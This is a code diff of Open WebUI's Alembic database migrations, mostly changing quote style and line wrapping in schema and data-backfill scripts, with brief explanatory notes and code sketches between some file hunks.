inspector.get_pk_constraint("user")["name"], type_="primary" - ) + if pk_columns and pk_columns != ['id']: + batch_op.drop_constraint(inspector.get_pk_constraint('user')['name'], type_='primary') # Add unique constraint if missing - if ("id",) not in unique_columns: - batch_op.create_unique_constraint("uq_user_id", ["id"]) + if ('id',) not in unique_columns: + batch_op.create_unique_constraint('uq_user_id', ['id']) # Re-create correct primary key - batch_op.create_primary_key("pk_user_id", ["id"]) + batch_op.create_primary_key('pk_user_id', ['id']) # Create oauth_session table op.create_table( - "oauth_session", - sa.Column("id", sa.Text(), primary_key=True, nullable=False, unique=True), + 'oauth_session', + sa.Column('id', sa.Text(), primary_key=True, nullable=False, unique=True), sa.Column( - "user_id", + 'user_id', sa.Text(), - sa.ForeignKey("user.id", ondelete="CASCADE"), + sa.ForeignKey('user.id', ondelete='CASCADE'), nullable=False, ), - sa.Column("provider", sa.Text(), nullable=False), - sa.Column("token", sa.Text(), nullable=False), - sa.Column("expires_at", sa.BigInteger(), nullable=False), - sa.Column("created_at", sa.BigInteger(), nullable=False), - sa.Column("updated_at", sa.BigInteger(), nullable=False), + sa.Column('provider', sa.Text(), nullable=False), + sa.Column('token', sa.Text(), nullable=False), + sa.Column('expires_at', sa.BigInteger(), nullable=False), + sa.Column('created_at', sa.BigInteger(), nullable=False), + sa.Column('updated_at', sa.BigInteger(), nullable=False), ) # Create indexes for better performance - op.create_index("idx_oauth_session_user_id", "oauth_session", ["user_id"]) - op.create_index("idx_oauth_session_expires_at", "oauth_session", ["expires_at"]) - op.create_index( - "idx_oauth_session_user_provider", "oauth_session", ["user_id", "provider"] - ) + op.create_index('idx_oauth_session_user_id', 'oauth_session', ['user_id']) + op.create_index('idx_oauth_session_expires_at', 'oauth_session', ['expires_at']) + 
op.create_index('idx_oauth_session_user_provider', 'oauth_session', ['user_id', 'provider']) def downgrade() -> None: # Drop indexes first - op.drop_index("idx_oauth_session_user_provider", table_name="oauth_session") - op.drop_index("idx_oauth_session_expires_at", table_name="oauth_session") - op.drop_index("idx_oauth_session_user_id", table_name="oauth_session") + op.drop_index('idx_oauth_session_user_provider', table_name='oauth_session') + op.drop_index('idx_oauth_session_expires_at', table_name='oauth_session') + op.drop_index('idx_oauth_session_user_id', table_name='oauth_session') # Drop the table - op.drop_table("oauth_session") + op.drop_table('oauth_session')
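Before creating oauth_session with a ForeignKey onto user.id, the migration inspects the live schema and repairs the primary key only if it is actually wrong. The inspect-then-repair idiom, reduced to its core (a sketch; the real migration also reconciles unique constraints, as shown above):

    import sqlalchemy as sa
    from alembic import op

    def ensure_id_primary_key(table_name: str = 'user') -> None:
        inspector = sa.inspect(op.get_bind())
        pk = inspector.get_pk_constraint(table_name)
        if pk['constrained_columns'] == ['id']:
            return  # already correct; leave the schema alone
        with op.batch_alter_table(table_name) as batch_op:
            if pk['constrained_columns'] and pk['name']:
                batch_op.drop_constraint(pk['name'], type_='primary')
            batch_op.create_primary_key(f'pk_{table_name}_id', ['id'])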
backend/open_webui/migrations/versions/3ab32c4b8f59_update_tags.py+27 −30 modified@@ -13,8 +13,8 @@ import json -revision = "3ab32c4b8f59" -down_revision = "1af9b942657b" +revision = '3ab32c4b8f59' +down_revision = '1af9b942657b' branch_labels = None depends_on = None @@ -24,58 +24,55 @@ def upgrade(): inspector = Inspector.from_engine(conn) # Inspecting the 'tag' table constraints and structure - existing_pk = inspector.get_pk_constraint("tag") - unique_constraints = inspector.get_unique_constraints("tag") - existing_indexes = inspector.get_indexes("tag") + existing_pk = inspector.get_pk_constraint('tag') + unique_constraints = inspector.get_unique_constraints('tag') + existing_indexes = inspector.get_indexes('tag') - print(f"Primary Key: {existing_pk}") - print(f"Unique Constraints: {unique_constraints}") - print(f"Indexes: {existing_indexes}") + print(f'Primary Key: {existing_pk}') + print(f'Unique Constraints: {unique_constraints}') + print(f'Indexes: {existing_indexes}') - with op.batch_alter_table("tag", schema=None) as batch_op: + with op.batch_alter_table('tag', schema=None) as batch_op: # Drop existing primary key constraint if it exists - if existing_pk and existing_pk.get("constrained_columns"): - pk_name = existing_pk.get("name") + if existing_pk and existing_pk.get('constrained_columns'): + pk_name = existing_pk.get('name') if pk_name: - print(f"Dropping primary key constraint: {pk_name}") - batch_op.drop_constraint(pk_name, type_="primary") + print(f'Dropping primary key constraint: {pk_name}') + batch_op.drop_constraint(pk_name, type_='primary') # Now create the new primary key with the combination of 'id' and 'user_id' print("Creating new primary key with 'id' and 'user_id'.") - batch_op.create_primary_key("pk_id_user_id", ["id", "user_id"]) + batch_op.create_primary_key('pk_id_user_id', ['id', 'user_id']) # Drop unique constraints that could conflict with the new primary key for constraint in unique_constraints: if ( - constraint["name"] == "uq_id_user_id" + constraint['name'] == 'uq_id_user_id' ): # Adjust this name according to what is actually returned by the inspector - print(f"Dropping unique constraint: {constraint['name']}") - batch_op.drop_constraint(constraint["name"], type_="unique") + print(f'Dropping unique constraint: {constraint["name"]}') + batch_op.drop_constraint(constraint['name'], type_='unique') for index in existing_indexes: - if index["unique"]: - if not any( - constraint["name"] == index["name"] - for constraint in unique_constraints - ): + if index['unique']: + if not any(constraint['name'] == index['name'] for constraint in unique_constraints): # You are attempting to drop unique indexes - print(f"Dropping unique index: {index['name']}") - batch_op.drop_index(index["name"]) + print(f'Dropping unique index: {index["name"]}') + batch_op.drop_index(index['name']) def downgrade(): conn = op.get_bind() inspector = Inspector.from_engine(conn) - current_pk = inspector.get_pk_constraint("tag") + current_pk = inspector.get_pk_constraint('tag') - with op.batch_alter_table("tag", schema=None) as batch_op: + with op.batch_alter_table('tag', schema=None) as batch_op: # Drop the current primary key first, if it matches the one we know we added in upgrade - if current_pk and "pk_id_user_id" == current_pk.get("name"): - batch_op.drop_constraint("pk_id_user_id", type_="primary") + if current_pk and 'pk_id_user_id' == current_pk.get('name'): + batch_op.drop_constraint('pk_id_user_id', type_='primary') # Restore the original primary key - 
batch_op.create_primary_key("pk_id", ["id"]) + batch_op.create_primary_key('pk_id', ['id']) # Since primary key on just 'id' is restored, we now add back any unique constraints if necessary - batch_op.create_unique_constraint("uq_id_user_id", ["id", "user_id"]) + batch_op.create_unique_constraint('uq_id_user_id', ['id', 'user_id'])
backend/open_webui/migrations/versions/3af16a1c9fb6_update_user_table.py  +10 −10  modified

@@ -12,21 +12,21 @@
 import sqlalchemy as sa

 # revision identifiers, used by Alembic.
-revision: str = "3af16a1c9fb6"
-down_revision: Union[str, None] = "018012973d35"
+revision: str = '3af16a1c9fb6'
+down_revision: Union[str, None] = '018012973d35'
 branch_labels: Union[str, Sequence[str], None] = None
 depends_on: Union[str, Sequence[str], None] = None


 def upgrade() -> None:
-    op.add_column("user", sa.Column("username", sa.String(length=50), nullable=True))
-    op.add_column("user", sa.Column("bio", sa.Text(), nullable=True))
-    op.add_column("user", sa.Column("gender", sa.Text(), nullable=True))
-    op.add_column("user", sa.Column("date_of_birth", sa.Date(), nullable=True))
+    op.add_column('user', sa.Column('username', sa.String(length=50), nullable=True))
+    op.add_column('user', sa.Column('bio', sa.Text(), nullable=True))
+    op.add_column('user', sa.Column('gender', sa.Text(), nullable=True))
+    op.add_column('user', sa.Column('date_of_birth', sa.Date(), nullable=True))


 def downgrade() -> None:
-    op.drop_column("user", "username")
-    op.drop_column("user", "bio")
-    op.drop_column("user", "gender")
-    op.drop_column("user", "date_of_birth")
+    op.drop_column('user', 'username')
+    op.drop_column('user', 'bio')
+    op.drop_column('user', 'gender')
+    op.drop_column('user', 'date_of_birth')
backend/open_webui/migrations/versions/3e0e00844bb0_add_knowledge_file_table.py+50 −58 modified@@ -18,74 +18,72 @@ import uuid # revision identifiers, used by Alembic. -revision: str = "3e0e00844bb0" -down_revision: Union[str, None] = "90ef40d4714e" +revision: str = '3e0e00844bb0' +down_revision: Union[str, None] = '90ef40d4714e' branch_labels: Union[str, Sequence[str], None] = None depends_on: Union[str, Sequence[str], None] = None def upgrade() -> None: op.create_table( - "knowledge_file", - sa.Column("id", sa.Text(), primary_key=True), - sa.Column("user_id", sa.Text(), nullable=False), + 'knowledge_file', + sa.Column('id', sa.Text(), primary_key=True), + sa.Column('user_id', sa.Text(), nullable=False), sa.Column( - "knowledge_id", + 'knowledge_id', sa.Text(), - sa.ForeignKey("knowledge.id", ondelete="CASCADE"), + sa.ForeignKey('knowledge.id', ondelete='CASCADE'), nullable=False, ), sa.Column( - "file_id", + 'file_id', sa.Text(), - sa.ForeignKey("file.id", ondelete="CASCADE"), + sa.ForeignKey('file.id', ondelete='CASCADE'), nullable=False, ), - sa.Column("created_at", sa.BigInteger(), nullable=False), - sa.Column("updated_at", sa.BigInteger(), nullable=False), + sa.Column('created_at', sa.BigInteger(), nullable=False), + sa.Column('updated_at', sa.BigInteger(), nullable=False), # indexes - sa.Index("ix_knowledge_file_knowledge_id", "knowledge_id"), - sa.Index("ix_knowledge_file_file_id", "file_id"), - sa.Index("ix_knowledge_file_user_id", "user_id"), + sa.Index('ix_knowledge_file_knowledge_id', 'knowledge_id'), + sa.Index('ix_knowledge_file_file_id', 'file_id'), + sa.Index('ix_knowledge_file_user_id', 'user_id'), # unique constraints sa.UniqueConstraint( - "knowledge_id", "file_id", name="uq_knowledge_file_knowledge_file" + 'knowledge_id', 'file_id', name='uq_knowledge_file_knowledge_file' ), # prevent duplicate entries ) connection = op.get_bind() # 2. Read existing group with user_ids JSON column knowledge_table = sa.Table( - "knowledge", + 'knowledge', sa.MetaData(), - sa.Column("id", sa.Text()), - sa.Column("user_id", sa.Text()), - sa.Column("data", sa.JSON()), # JSON stored as text in SQLite + PG + sa.Column('id', sa.Text()), + sa.Column('user_id', sa.Text()), + sa.Column('data', sa.JSON()), # JSON stored as text in SQLite + PG ) results = connection.execute( - sa.select( - knowledge_table.c.id, knowledge_table.c.user_id, knowledge_table.c.data - ) + sa.select(knowledge_table.c.id, knowledge_table.c.user_id, knowledge_table.c.data) ).fetchall() # 3. 
Insert members into group_member table kf_table = sa.Table( - "knowledge_file", + 'knowledge_file', sa.MetaData(), - sa.Column("id", sa.Text()), - sa.Column("user_id", sa.Text()), - sa.Column("knowledge_id", sa.Text()), - sa.Column("file_id", sa.Text()), - sa.Column("created_at", sa.BigInteger()), - sa.Column("updated_at", sa.BigInteger()), + sa.Column('id', sa.Text()), + sa.Column('user_id', sa.Text()), + sa.Column('knowledge_id', sa.Text()), + sa.Column('file_id', sa.Text()), + sa.Column('created_at', sa.BigInteger()), + sa.Column('updated_at', sa.BigInteger()), ) file_table = sa.Table( - "file", + 'file', sa.MetaData(), - sa.Column("id", sa.Text()), + sa.Column('id', sa.Text()), ) now = int(time.time()) @@ -102,50 +100,48 @@ def upgrade() -> None: if not isinstance(data, dict): continue - file_ids = data.get("file_ids", []) + file_ids = data.get('file_ids', []) for file_id in file_ids: - file_exists = connection.execute( - sa.select(file_table.c.id).where(file_table.c.id == file_id) - ).fetchone() + file_exists = connection.execute(sa.select(file_table.c.id).where(file_table.c.id == file_id)).fetchone() if not file_exists: continue # skip non-existing files row = { - "id": str(uuid.uuid4()), - "user_id": user_id, - "knowledge_id": knowledge_id, - "file_id": file_id, - "created_at": now, - "updated_at": now, + 'id': str(uuid.uuid4()), + 'user_id': user_id, + 'knowledge_id': knowledge_id, + 'file_id': file_id, + 'created_at': now, + 'updated_at': now, } connection.execute(kf_table.insert().values(**row)) - with op.batch_alter_table("knowledge") as batch: - batch.drop_column("data") + with op.batch_alter_table('knowledge') as batch: + batch.drop_column('data') def downgrade() -> None: # 1. Add back the old data column - op.add_column("knowledge", sa.Column("data", sa.JSON(), nullable=True)) + op.add_column('knowledge', sa.Column('data', sa.JSON(), nullable=True)) connection = op.get_bind() # 2. Read knowledge_file entries and reconstruct data JSON knowledge_table = sa.Table( - "knowledge", + 'knowledge', sa.MetaData(), - sa.Column("id", sa.Text()), - sa.Column("data", sa.JSON()), + sa.Column('id', sa.Text()), + sa.Column('data', sa.JSON()), ) kf_table = sa.Table( - "knowledge_file", + 'knowledge_file', sa.MetaData(), - sa.Column("id", sa.Text()), - sa.Column("knowledge_id", sa.Text()), - sa.Column("file_id", sa.Text()), + sa.Column('id', sa.Text()), + sa.Column('knowledge_id', sa.Text()), + sa.Column('file_id', sa.Text()), ) results = connection.execute(sa.select(knowledge_table.c.id)).fetchall() @@ -157,13 +153,9 @@ def downgrade() -> None: file_ids_list = [fid for (fid,) in file_ids] - data_json = {"file_ids": file_ids_list} + data_json = {'file_ids': file_ids_list} - connection.execute( - knowledge_table.update() - .where(knowledge_table.c.id == knowledge_id) - .values(data=data_json) - ) + connection.execute(knowledge_table.update().where(knowledge_table.c.id == knowledge_id).values(data=data_json)) # 3. Drop the knowledge_file table - op.drop_table("knowledge_file") + op.drop_table('knowledge_file')
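Since legacy knowledge.data could name file ids that were deleted long ago, the backfill above probes the file table before each insert instead of letting the new ForeignKey abort the migration on the first orphan. The guard on its own (file_exists is an illustrative name; file_table is the handle from the migration):

    import sqlalchemy as sa

    def file_exists(conn, file_table, file_id: str) -> bool:
        # Existence probe; skipping orphans keeps knowledge_file's FK satisfiable.
        return conn.execute(
            sa.select(file_table.c.id).where(file_table.c.id == file_id)
        ).fetchone() is not None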
backend/open_webui/migrations/versions/4ace53fd72c8_update_folder_table_datetime.py+12 −12 modified@@ -9,56 +9,56 @@ from alembic import op import sqlalchemy as sa -revision = "4ace53fd72c8" -down_revision = "af906e964978" +revision = '4ace53fd72c8' +down_revision = 'af906e964978' branch_labels = None depends_on = None def upgrade(): # Perform safe alterations using batch operation - with op.batch_alter_table("folder", schema=None) as batch_op: + with op.batch_alter_table('folder', schema=None) as batch_op: # Step 1: Remove server defaults for created_at and updated_at batch_op.alter_column( - "created_at", + 'created_at', server_default=None, # Removing server default ) batch_op.alter_column( - "updated_at", + 'updated_at', server_default=None, # Removing server default ) # Step 2: Change the column types to BigInteger for created_at batch_op.alter_column( - "created_at", + 'created_at', type_=sa.BigInteger(), existing_type=sa.DateTime(), existing_nullable=False, - postgresql_using="extract(epoch from created_at)::bigint", # Conversion for PostgreSQL + postgresql_using='extract(epoch from created_at)::bigint', # Conversion for PostgreSQL ) # Change the column types to BigInteger for updated_at batch_op.alter_column( - "updated_at", + 'updated_at', type_=sa.BigInteger(), existing_type=sa.DateTime(), existing_nullable=False, - postgresql_using="extract(epoch from updated_at)::bigint", # Conversion for PostgreSQL + postgresql_using='extract(epoch from updated_at)::bigint', # Conversion for PostgreSQL ) def downgrade(): # Downgrade: Convert columns back to DateTime and restore defaults - with op.batch_alter_table("folder", schema=None) as batch_op: + with op.batch_alter_table('folder', schema=None) as batch_op: batch_op.alter_column( - "created_at", + 'created_at', type_=sa.DateTime(), existing_type=sa.BigInteger(), existing_nullable=False, server_default=sa.func.now(), # Restoring server default on downgrade ) batch_op.alter_column( - "updated_at", + 'updated_at', type_=sa.DateTime(), existing_type=sa.BigInteger(), existing_nullable=False,
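The folder migration converts DateTime columns to epoch seconds, and the dialect split is the interesting part: postgresql_using hands PostgreSQL the cast expression it requires and is ignored by other dialects, while batch mode supplies the table rebuild SQLite needs for in-place type changes. One column change, reduced to a sketch:

    import sqlalchemy as sa
    from alembic import op

    def convert_created_at_to_epoch() -> None:
        with op.batch_alter_table('folder') as batch_op:
            # Drop the DateTime server default first; it is meaningless for epoch ints.
            batch_op.alter_column('created_at', server_default=None)
            batch_op.alter_column(
                'created_at',
                type_=sa.BigInteger(),
                existing_type=sa.DateTime(),
                existing_nullable=False,
                # PostgreSQL-only cast expression; other dialects ignore this kwarg
                postgresql_using='extract(epoch from created_at)::bigint',
            )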
backend/open_webui/migrations/versions/57c599a3cb57_add_channel_table.py+23 −23 modified@@ -9,40 +9,40 @@ from alembic import op import sqlalchemy as sa -revision = "57c599a3cb57" -down_revision = "922e7a387820" +revision = '57c599a3cb57' +down_revision = '922e7a387820' branch_labels = None depends_on = None def upgrade(): op.create_table( - "channel", - sa.Column("id", sa.Text(), nullable=False, primary_key=True, unique=True), - sa.Column("user_id", sa.Text()), - sa.Column("name", sa.Text()), - sa.Column("description", sa.Text(), nullable=True), - sa.Column("data", sa.JSON(), nullable=True), - sa.Column("meta", sa.JSON(), nullable=True), - sa.Column("access_control", sa.JSON(), nullable=True), - sa.Column("created_at", sa.BigInteger(), nullable=True), - sa.Column("updated_at", sa.BigInteger(), nullable=True), + 'channel', + sa.Column('id', sa.Text(), nullable=False, primary_key=True, unique=True), + sa.Column('user_id', sa.Text()), + sa.Column('name', sa.Text()), + sa.Column('description', sa.Text(), nullable=True), + sa.Column('data', sa.JSON(), nullable=True), + sa.Column('meta', sa.JSON(), nullable=True), + sa.Column('access_control', sa.JSON(), nullable=True), + sa.Column('created_at', sa.BigInteger(), nullable=True), + sa.Column('updated_at', sa.BigInteger(), nullable=True), ) op.create_table( - "message", - sa.Column("id", sa.Text(), nullable=False, primary_key=True, unique=True), - sa.Column("user_id", sa.Text()), - sa.Column("channel_id", sa.Text(), nullable=True), - sa.Column("content", sa.Text()), - sa.Column("data", sa.JSON(), nullable=True), - sa.Column("meta", sa.JSON(), nullable=True), - sa.Column("created_at", sa.BigInteger(), nullable=True), - sa.Column("updated_at", sa.BigInteger(), nullable=True), + 'message', + sa.Column('id', sa.Text(), nullable=False, primary_key=True, unique=True), + sa.Column('user_id', sa.Text()), + sa.Column('channel_id', sa.Text(), nullable=True), + sa.Column('content', sa.Text()), + sa.Column('data', sa.JSON(), nullable=True), + sa.Column('meta', sa.JSON(), nullable=True), + sa.Column('created_at', sa.BigInteger(), nullable=True), + sa.Column('updated_at', sa.BigInteger(), nullable=True), ) def downgrade(): - op.drop_table("channel") + op.drop_table('channel') - op.drop_table("message") + op.drop_table('message')
backend/open_webui/migrations/versions/6283dc0e4d8d_add_channel_file_table.py+16 −18 modified@@ -13,41 +13,39 @@ import open_webui.internal.db # revision identifiers, used by Alembic. -revision: str = "6283dc0e4d8d" -down_revision: Union[str, None] = "3e0e00844bb0" +revision: str = '6283dc0e4d8d' +down_revision: Union[str, None] = '3e0e00844bb0' branch_labels: Union[str, Sequence[str], None] = None depends_on: Union[str, Sequence[str], None] = None def upgrade() -> None: op.create_table( - "channel_file", - sa.Column("id", sa.Text(), primary_key=True), - sa.Column("user_id", sa.Text(), nullable=False), + 'channel_file', + sa.Column('id', sa.Text(), primary_key=True), + sa.Column('user_id', sa.Text(), nullable=False), sa.Column( - "channel_id", + 'channel_id', sa.Text(), - sa.ForeignKey("channel.id", ondelete="CASCADE"), + sa.ForeignKey('channel.id', ondelete='CASCADE'), nullable=False, ), sa.Column( - "file_id", + 'file_id', sa.Text(), - sa.ForeignKey("file.id", ondelete="CASCADE"), + sa.ForeignKey('file.id', ondelete='CASCADE'), nullable=False, ), - sa.Column("created_at", sa.BigInteger(), nullable=False), - sa.Column("updated_at", sa.BigInteger(), nullable=False), + sa.Column('created_at', sa.BigInteger(), nullable=False), + sa.Column('updated_at', sa.BigInteger(), nullable=False), # indexes - sa.Index("ix_channel_file_channel_id", "channel_id"), - sa.Index("ix_channel_file_file_id", "file_id"), - sa.Index("ix_channel_file_user_id", "user_id"), + sa.Index('ix_channel_file_channel_id', 'channel_id'), + sa.Index('ix_channel_file_file_id', 'file_id'), + sa.Index('ix_channel_file_user_id', 'user_id'), # unique constraints - sa.UniqueConstraint( - "channel_id", "file_id", name="uq_channel_file_channel_file" - ), # prevent duplicate entries + sa.UniqueConstraint('channel_id', 'file_id', name='uq_channel_file_channel_file'), # prevent duplicate entries ) def downgrade() -> None: - op.drop_table("channel_file") + op.drop_table('channel_file')
backend/open_webui/migrations/versions/6a39f3d8e55c_add_knowledge_table.py+24 −24 modified@@ -11,37 +11,37 @@ from sqlalchemy.sql import table, column, select import json -revision = "6a39f3d8e55c" -down_revision = "c0fbf31ca0db" +revision = '6a39f3d8e55c' +down_revision = 'c0fbf31ca0db' branch_labels = None depends_on = None def upgrade(): # Creating the 'knowledge' table - print("Creating knowledge table") + print('Creating knowledge table') knowledge_table = op.create_table( - "knowledge", - sa.Column("id", sa.Text(), primary_key=True), - sa.Column("user_id", sa.Text(), nullable=False), - sa.Column("name", sa.Text(), nullable=False), - sa.Column("description", sa.Text(), nullable=True), - sa.Column("data", sa.JSON(), nullable=True), - sa.Column("meta", sa.JSON(), nullable=True), - sa.Column("created_at", sa.BigInteger(), nullable=False), - sa.Column("updated_at", sa.BigInteger(), nullable=True), + 'knowledge', + sa.Column('id', sa.Text(), primary_key=True), + sa.Column('user_id', sa.Text(), nullable=False), + sa.Column('name', sa.Text(), nullable=False), + sa.Column('description', sa.Text(), nullable=True), + sa.Column('data', sa.JSON(), nullable=True), + sa.Column('meta', sa.JSON(), nullable=True), + sa.Column('created_at', sa.BigInteger(), nullable=False), + sa.Column('updated_at', sa.BigInteger(), nullable=True), ) - print("Migrating data from document table to knowledge table") + print('Migrating data from document table to knowledge table') # Representation of the existing 'document' table document_table = table( - "document", - column("collection_name", sa.String()), - column("user_id", sa.String()), - column("name", sa.String()), - column("title", sa.Text()), - column("content", sa.Text()), - column("timestamp", sa.BigInteger()), + 'document', + column('collection_name', sa.String()), + column('user_id', sa.String()), + column('name', sa.String()), + column('title', sa.Text()), + column('content', sa.Text()), + column('timestamp', sa.BigInteger()), ) # Select all from existing document table @@ -64,9 +64,9 @@ def upgrade(): user_id=doc.user_id, description=doc.name, meta={ - "legacy": True, - "document": True, - "tags": json.loads(doc.content or "{}").get("tags", []), + 'legacy': True, + 'document': True, + 'tags': json.loads(doc.content or '{}').get('tags', []), }, name=doc.title, created_at=doc.timestamp, @@ -76,4 +76,4 @@ def upgrade(): def downgrade(): - op.drop_table("knowledge") + op.drop_table('knowledge')
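The document→knowledge copy above builds each row's meta from the legacy JSON content blob. Pulled out as a helper (hypothetical name), note that or '{}' only protects against NULL/empty content; a row holding malformed JSON would still raise, exactly as in the original hunk:

    import json

    def legacy_meta(content):
        # `or '{}'` guards NULL/empty content; malformed JSON still raises.
        return {
            'legacy': True,
            'document': True,
            'tags': json.loads(content or '{}').get('tags', []),
        }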
backend/open_webui/migrations/versions/7826ab40b532_update_file_table.py  +5 −5  modified

@@ -9,18 +9,18 @@
 from alembic import op
 import sqlalchemy as sa

-revision = "7826ab40b532"
-down_revision = "57c599a3cb57"
+revision = '7826ab40b532'
+down_revision = '57c599a3cb57'
 branch_labels = None
 depends_on = None


 def upgrade():
     op.add_column(
-        "file",
-        sa.Column("access_control", sa.JSON(), nullable=True),
+        'file',
+        sa.Column('access_control', sa.JSON(), nullable=True),
     )


 def downgrade():
-    op.drop_column("file", "access_control")
+    op.drop_column('file', 'access_control')
backend/open_webui/migrations/versions/7e5b5dc7342b_init.py+136 −136 modified@@ -16,7 +16,7 @@ from open_webui.migrations.util import get_existing_tables # revision identifiers, used by Alembic. -revision: str = "7e5b5dc7342b" +revision: str = '7e5b5dc7342b' down_revision: Union[str, None] = None branch_labels: Union[str, Sequence[str], None] = None depends_on: Union[str, Sequence[str], None] = None @@ -26,179 +26,179 @@ def upgrade() -> None: existing_tables = set(get_existing_tables()) # ### commands auto generated by Alembic - please adjust! ### - if "auth" not in existing_tables: + if 'auth' not in existing_tables: op.create_table( - "auth", - sa.Column("id", sa.String(), nullable=False), - sa.Column("email", sa.String(), nullable=True), - sa.Column("password", sa.Text(), nullable=True), - sa.Column("active", sa.Boolean(), nullable=True), - sa.PrimaryKeyConstraint("id"), + 'auth', + sa.Column('id', sa.String(), nullable=False), + sa.Column('email', sa.String(), nullable=True), + sa.Column('password', sa.Text(), nullable=True), + sa.Column('active', sa.Boolean(), nullable=True), + sa.PrimaryKeyConstraint('id'), ) - if "chat" not in existing_tables: + if 'chat' not in existing_tables: op.create_table( - "chat", - sa.Column("id", sa.String(), nullable=False), - sa.Column("user_id", sa.String(), nullable=True), - sa.Column("title", sa.Text(), nullable=True), - sa.Column("chat", sa.Text(), nullable=True), - sa.Column("created_at", sa.BigInteger(), nullable=True), - sa.Column("updated_at", sa.BigInteger(), nullable=True), - sa.Column("share_id", sa.Text(), nullable=True), - sa.Column("archived", sa.Boolean(), nullable=True), - sa.PrimaryKeyConstraint("id"), - sa.UniqueConstraint("share_id"), + 'chat', + sa.Column('id', sa.String(), nullable=False), + sa.Column('user_id', sa.String(), nullable=True), + sa.Column('title', sa.Text(), nullable=True), + sa.Column('chat', sa.Text(), nullable=True), + sa.Column('created_at', sa.BigInteger(), nullable=True), + sa.Column('updated_at', sa.BigInteger(), nullable=True), + sa.Column('share_id', sa.Text(), nullable=True), + sa.Column('archived', sa.Boolean(), nullable=True), + sa.PrimaryKeyConstraint('id'), + sa.UniqueConstraint('share_id'), ) - if "chatidtag" not in existing_tables: + if 'chatidtag' not in existing_tables: op.create_table( - "chatidtag", - sa.Column("id", sa.String(), nullable=False), - sa.Column("tag_name", sa.String(), nullable=True), - sa.Column("chat_id", sa.String(), nullable=True), - sa.Column("user_id", sa.String(), nullable=True), - sa.Column("timestamp", sa.BigInteger(), nullable=True), - sa.PrimaryKeyConstraint("id"), + 'chatidtag', + sa.Column('id', sa.String(), nullable=False), + sa.Column('tag_name', sa.String(), nullable=True), + sa.Column('chat_id', sa.String(), nullable=True), + sa.Column('user_id', sa.String(), nullable=True), + sa.Column('timestamp', sa.BigInteger(), nullable=True), + sa.PrimaryKeyConstraint('id'), ) - if "document" not in existing_tables: + if 'document' not in existing_tables: op.create_table( - "document", - sa.Column("collection_name", sa.String(), nullable=False), - sa.Column("name", sa.String(), nullable=True), - sa.Column("title", sa.Text(), nullable=True), - sa.Column("filename", sa.Text(), nullable=True), - sa.Column("content", sa.Text(), nullable=True), - sa.Column("user_id", sa.String(), nullable=True), - sa.Column("timestamp", sa.BigInteger(), nullable=True), - sa.PrimaryKeyConstraint("collection_name"), - sa.UniqueConstraint("name"), + 'document', + sa.Column('collection_name', sa.String(), 
nullable=False), + sa.Column('name', sa.String(), nullable=True), + sa.Column('title', sa.Text(), nullable=True), + sa.Column('filename', sa.Text(), nullable=True), + sa.Column('content', sa.Text(), nullable=True), + sa.Column('user_id', sa.String(), nullable=True), + sa.Column('timestamp', sa.BigInteger(), nullable=True), + sa.PrimaryKeyConstraint('collection_name'), + sa.UniqueConstraint('name'), ) - if "file" not in existing_tables: + if 'file' not in existing_tables: op.create_table( - "file", - sa.Column("id", sa.String(), nullable=False), - sa.Column("user_id", sa.String(), nullable=True), - sa.Column("filename", sa.Text(), nullable=True), - sa.Column("meta", JSONField(), nullable=True), - sa.Column("created_at", sa.BigInteger(), nullable=True), - sa.PrimaryKeyConstraint("id"), + 'file', + sa.Column('id', sa.String(), nullable=False), + sa.Column('user_id', sa.String(), nullable=True), + sa.Column('filename', sa.Text(), nullable=True), + sa.Column('meta', JSONField(), nullable=True), + sa.Column('created_at', sa.BigInteger(), nullable=True), + sa.PrimaryKeyConstraint('id'), ) - if "function" not in existing_tables: + if 'function' not in existing_tables: op.create_table( - "function", - sa.Column("id", sa.String(), nullable=False), - sa.Column("user_id", sa.String(), nullable=True), - sa.Column("name", sa.Text(), nullable=True), - sa.Column("type", sa.Text(), nullable=True), - sa.Column("content", sa.Text(), nullable=True), - sa.Column("meta", JSONField(), nullable=True), - sa.Column("valves", JSONField(), nullable=True), - sa.Column("is_active", sa.Boolean(), nullable=True), - sa.Column("is_global", sa.Boolean(), nullable=True), - sa.Column("updated_at", sa.BigInteger(), nullable=True), - sa.Column("created_at", sa.BigInteger(), nullable=True), - sa.PrimaryKeyConstraint("id"), + 'function', + sa.Column('id', sa.String(), nullable=False), + sa.Column('user_id', sa.String(), nullable=True), + sa.Column('name', sa.Text(), nullable=True), + sa.Column('type', sa.Text(), nullable=True), + sa.Column('content', sa.Text(), nullable=True), + sa.Column('meta', JSONField(), nullable=True), + sa.Column('valves', JSONField(), nullable=True), + sa.Column('is_active', sa.Boolean(), nullable=True), + sa.Column('is_global', sa.Boolean(), nullable=True), + sa.Column('updated_at', sa.BigInteger(), nullable=True), + sa.Column('created_at', sa.BigInteger(), nullable=True), + sa.PrimaryKeyConstraint('id'), ) - if "memory" not in existing_tables: + if 'memory' not in existing_tables: op.create_table( - "memory", - sa.Column("id", sa.String(), nullable=False), - sa.Column("user_id", sa.String(), nullable=True), - sa.Column("content", sa.Text(), nullable=True), - sa.Column("updated_at", sa.BigInteger(), nullable=True), - sa.Column("created_at", sa.BigInteger(), nullable=True), - sa.PrimaryKeyConstraint("id"), + 'memory', + sa.Column('id', sa.String(), nullable=False), + sa.Column('user_id', sa.String(), nullable=True), + sa.Column('content', sa.Text(), nullable=True), + sa.Column('updated_at', sa.BigInteger(), nullable=True), + sa.Column('created_at', sa.BigInteger(), nullable=True), + sa.PrimaryKeyConstraint('id'), ) - if "model" not in existing_tables: + if 'model' not in existing_tables: op.create_table( - "model", - sa.Column("id", sa.Text(), nullable=False), - sa.Column("user_id", sa.Text(), nullable=True), - sa.Column("base_model_id", sa.Text(), nullable=True), - sa.Column("name", sa.Text(), nullable=True), - sa.Column("params", JSONField(), nullable=True), - sa.Column("meta", JSONField(), 
